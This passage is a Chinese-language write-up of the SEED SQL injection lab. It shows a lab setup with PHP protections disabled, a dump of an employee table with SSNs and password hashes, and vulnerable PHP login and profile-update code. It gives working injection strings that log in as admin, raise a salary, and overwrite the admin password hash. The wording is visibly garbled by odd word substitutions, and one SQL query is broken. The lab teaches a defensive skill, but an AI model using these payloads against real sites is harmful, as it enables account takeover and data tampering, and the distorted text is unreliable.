select 列名 from 表名
update语句用于修正表中的数据
update 表名 set 列名 2= 值2 where 列名1 = 值1
普通的说 什么是SQL注入呢?
ailx10
网络安全精良回答者
网络安全硕士
便是用户输入的时候 输入SQL语句 变动后台SQL语句的预定的实行命令
SQL 教程www.w3school.com.cn/sql/
实验环境准备在SEED Ubuntu12虚拟机中安装SQL注入实验网站
$ tar -zxvf ./patch.tar.gz$ cd patch$ chmod a+x bootstrap.sh$ ./bootstrap.sh
关闭PHP SQL注入攻击保护机制
在/etc/php5/apache2/php.ini文件中
修正magic quotes gpc = On为Off
启动Apache做事(sudo service apache2 start)
在另一台Linux主机上配置DNS(在/etc/hosts文件添加)
192.168.59.156 www.seedlabsqlinjection.com
ok!现在你可以成功访问了 通过命令行登录并查看数据库信息如下
$ mysql -u root -pseedubuntumysql> use Users;mysql> show tables;+-----------------+| Tables_in_Users |+-----------------+| credential |+-----------------+mysql> select from credential;+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+| ID | Name | EID | Salary | birth | SSN | PhoneNumber | Address | Email | NickName | Password |+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+| 1 | Alice | 10000 | 20000 | 9/20 | 10211002 | | | | | fdbe918bdae83000aa54747fc95fe0470fff4976 || 2 | Boby | 20000 | 30000 | 4/20 | 10213352 | | | | | b78ed97677c161c1c82c142906674ad15242b2d4 || 3 | Ryan | 30000 | 50000 | 4/10 | 98993524 | | | | | a3c50276cb120637cca669eb38fb9928b017e9ef || 4 | Samy | 40000 | 90000 | 1/11 | 32193525 | | | | | 995b8b8c183f349b3cab0ae7fccd39133508d2af || 5 | Ted | 50000 | 110000 | 11/3 | 32111111 | | | | | 99343bff28a7bb51cb6f22cb20a618701a2c2f58 || 6 | Admin | 99999 | 400000 | 3/5 | 43254314 | | | | | a5bdf35a1df4ea895905f6f6618e83951a6effc0 |+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+
网站原始基本信息如下:
User Employee ID Password Salary Birthday SSN Nickname Email Address Phone#Admin 99999 seedadmin 400000 3/5 43254314Alice 10000 seedalice 20000 9/20 10211002Boby 20000 seedboby 50000 4/20 10213352Ryan 30000 seedryan 90000 4/10 32193525Samy 40000 seedsamy 40000 1/11 32111111Ted 50000 seedted 110000 11/3 24343244
1.SQL注入:如何越权直接变身成admin?
下面是网站登录模块的代码 找找漏洞?
$conn = getDB();$sql = "SELECT id, name, eid, salary, birth, ssn,phonenumber, address, email, nickname, PasswordFROM credentialWHERE eid= '$input_eid' and password='$input_pwd'";$result = $conn->query($sql))// The following is psuedo codeif(name=='admin'){return All employees information.} else if(name!=NULL){return employee information.} else {authentication fails.}
漏洞:"WHERE eid= '$input_eid' and password='$input_pwd'"
攻击串:' or Name='admin';#
成功登录如下
2.SQL注入:如何修正salary摇身一变变大款 ?
网站供应了一个页面 让用户修正自己的昵称 邮件 地址 电话 密码
更新个人信息的代码是这样写的 如何才能修正自己的salary金钱呢?
$conn = getDB();$sql = "UPDATE credential SET nickname='$nickname',email='$email',address='$address',phonenumber='$phonenumber',Password='$pwd'WHERE id= '$input_id' ";$conn->query($sql))
咱们在命令行查看数据库的时候 是不是看到了Salary信息
漏洞:$sql = "UPDATE credential SET nickname='$nickname',...
攻击串:',salary='9999999' where Name='Alice'#
瞬间让Alice同学成为最富有的人
3.SQL注入:如何修正password让admin无路可走 ?
root@gt:/home# echo -n "seedadmin" | openssl sha1(stdin)= a5bdf35a1df4ea895905f6f6618e83951a6effc0root@gt:/home# echo -n "hackbiji.top" | openssl sha1(stdin)= a504e9efce2d451b08c285b2dfd2e7f8b241ba03root@gt:/home#
攻击串:',Password='a504e9efce2d451b08c285b2dfd2e7f8b241ba03' where Name='Admin'#
现在Admin登录不上自己的帐号了 可怜的站长